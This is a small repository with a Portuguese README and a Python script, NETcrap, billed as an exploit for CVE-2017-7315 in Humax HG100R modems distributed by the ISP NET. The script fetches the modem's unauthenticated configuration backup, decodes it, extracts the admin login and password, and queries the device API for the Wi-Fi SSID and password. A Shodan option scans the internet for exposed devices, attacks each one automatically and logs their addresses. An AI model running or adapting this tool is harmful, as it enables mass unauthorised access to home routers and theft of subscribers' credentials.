├── README.md
└── NETcrap.py


/README.md:
--------------------------------------------------------------------------------
 1 | # NETcrap - CVE 2017-7315 - Explorando o modem HGR100-L2 da NET
 2 | 
 3 | <h3>Para rodar:</h3>
 4 | 
 5 | 	$ python NETCrap.py -h
 6 | 	
 7 | 	USAGE:  python NETcrap.py [GATEWAY]
 8 |      	 	 Ex:
 9 |      		 python NETcrap.py http://192.168.0.1
10 |      	 	 python NETcrap.py http://192.168.0.1/
11 |      	 	 python NETcrap.py 192.168.0.1     
12 |      	 	 python NETcrap.py 192.168.0.1/
13 | 
14 | <h3>Help-me :o</h3>
15 | 
16 | Contribua com minha pesquisa! Plz, ajude a tornar este código mais rápido e eficinte. Tks!
17 | 
18 | desenvolvido por _carlosnericorreia_<br>
19 | email: hackerama@protonmail.com
20 | 


--------------------------------------------------------------------------------
/NETcrap.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/python
  2 | # Exploit: CVE 2017-7315
  3 | # Date: 12 July 2017
  4 | # Exploit Author: Carlos Neri Correia
  5 | # Author Contact: hackerama@protonmail.com
  6 | 
  7 | import subprocess
  8 | import base64
  9 | import requests
 10 | import sys
 11 | import shodan
 12 | import threading	
 13 | 
 14 | def convert(gateway):
 15 | 		exploit = '/view/basic/GatewaySettings.bin'
 16 | 		if gateway.endswith('/'):
 17 | 				gateway = gateway[:-1]
 18 | 				
 19 | 		if not gateway.startswith('http://'):
 20 | 				url = 'http://'+ gateway+ exploit
 21 | 				return url
 22 | 		else:
 23 | 				url = gateway + exploit
 24 | 				return url
 25 | 
 26 | def encontre(word):
 27 | 	
 28 |     arq = open('wifi.txt', 'r').readlines()
 29 |     for item in arq:
 30 |         if item.rfind(word) != -1:
 31 |             trato = item.strip(' ')
 32 |             if trato.startswith('"ssid" : "#'):
 33 |                 continue
 34 |             else:
 35 |                 return trato
 36 | def wifi(gateway):
 37 | 	comando = 'curl -X POST -s -H \'Content-Type: application/x-www-form-urlencoded charset=UTF-8\' -d \'{\"method\":\"QuickSetupInfo\",\"id\":90,\"jsonrpc":\"2.0\"}\' http://'+gateway+'/api'
 38 | 	execu = subprocess.Popen([comando], shell=True, stdout=subprocess.PIPE).communicate()[0]
 39 | 	arq = open('wifi.txt', 'w').write(execu)             				
 40 | 
 41 | 
 42 | def shod():
 43 | 	try:
 44 | 		results = api.search(ssearch) #'HUMAX org:"NET Virtua"'
 45 | 		print 'Resultados encontrados: %s' % results['total']
 46 | 		for result in results['matches']:
 47 |    				gateway = (result['ip_str']+':' + str(result['port']))
 48 | 				print '\n'+'-'*55
 49 | 				print 'ALVO DETECTADO: ' + gateway
 50 | 				t = threading.Thread(target=main, args=(gateway,))
 51 | 				t.setDaemon(True)	
 52 | 				t.start()
 53 | 				t.join()
 54 | 				file = open('ipes.txt', 'a').write(result['ip_str']+':'+str(result['port'])+'\n')
 55 | 				
 56 | 
 57 | 	except shodan.APIError, e:
 58 | 		print 'Error: %s' % e
 59 | 	except KeyboardInterrupt, e:
 60 | 		print '\n[NETcrap] - Voce escolheu sair.'
 61 | 
 62 | def usage():
 63 | 
 64 | 	return """
 65 | USAGE:  python NETcrap.py [GATEWAY]
 66 | 		#rede interna
 67 | 	python NETcrap.py [IP EXTERNO:PORTA]
 68 | 		#rede externa
 69 | 	python NETcrap.py -s ['BUSCA']
 70 | 		#SHODAN search and exploit
 71 | 	python NETcrap -h
 72 | 		#this help :v
 73 | 	
 74 | 	Ex:
 75 | 	python NETcrap.py 192.168.0.1     
 76 | 	python NETcrap.py 192.168.0.1/
 77 | 	python NETcrap.py 179.123.123.179:9000
 78 | 	python -s 'HUMAX'
 79 | """
 80 | 
 81 | def main(gateway):
 82 | 	gateway2 = convert(gateway)
 83 | 	#print gateway2
 84 | 	url = gateway2
 85 | 	try:	
 86 | 		print '\n[NETcrap] - Baixando e decodificando arquivo de backup.'
 87 | 		req = requests.get(url,timeout=15, stream=True)
 88 | 		for chunk in req.iter_content(chunk_size=2048):
 89 | 			if chunk:
 90 | 				raw = req.content
 91 | 		output = base64.b64decode(raw).decode('ascii','ignore').replace('^@','')
 92 | 		open('saida.txt', 'w').write(output)
 93 | 		
 94 | 		extract = subprocess.Popen(["strings saida.txt | grep -A 1 admin"], shell=True,stdout=subprocess.PIPE).communicate()[0].split('\n')
 95 | 		wifi(gateway)	
 96 | 		print '[NETcrap] - Credenciais de acesso encontradas.\n'
 97 | 		print 'INFOS DO MODEM:'
 98 | 		print '---------------'
 99 | 		print 'Login: %s' % extract[0]
100 | 		print 'Senha: %s' % extract[1]
101 | 		print 'Modelo: ' + encontre('model_name') [16:-3]
102 | 		print 'Provedor: ' + encontre('vendor_name')[17:-2]+'\n'
103 | 		print 'INFOS DO WI-FI:'
104 | 		print '-------------- '
105 | 		print 'SSID: ' + encontre('"ssid"')[10:-3]
106 | 		print 'Password: ' + encontre('password')[14:-3]+'\n'
107 | 
108 | 	except:
109 | 		print '\n[NETcrap] - Nao foi possivel obter as credenciais de acesso'
110 | 		pass
111 | 
112 | print """
113 | +-----------------------------------------------------+
114 | |           NETcrap - Exploit CVE 2017-7315           |
115 | +-----------------------------------------------------+
116 |                  facebook.com/hacker4ma
117 | 
118 | Download privilegiado de arquivo de backup e bypass dos 
119 | modems Humax Digital HG100R 2.0.6 (modems padrao da NET) 
120 | obtendo credenciais e outras informacoes sensiveis. 
121 | """
122 | SHODAN_API_KEY = ""
123 | api = shodan.Shodan(SHODAN_API_KEY)
124 | 
125 | if len(sys.argv) > 1:
126 | 	gateway = convert(sys.argv[1])
127 | 	url = str(gateway) #+'/view/basic/GatewaySettings.bin'
128 | 	if sys.argv[1] == '-h':
129 | 		print usage()
130 | 		sys.exit(0)
131 | 	if sys.argv[1] == '-s':
132 | 		try:
133 | 			ssearch = sys.argv[2]
134 | 			url = str(gateway)
135 | 			shod()
136 | 		except KeyboardInterrupt:
137 | 			sys.exit(0)
138 | 		sys.exit(0)
139 | 	else:
140 | 			
141 | 		main(sys.argv[1])
142 | 		print '[NETcrap] - Arquivo de backup salvo como saida.txt. '
143 | 		print '[NETcrap] - Outras informacoes interessantes foram salvas no arquivo wifi.txt.\n'
144 | else:
145 | 	print usage()
146 | 
147 | 
148 | 
149 | 


--------------------------------------------------------------------------------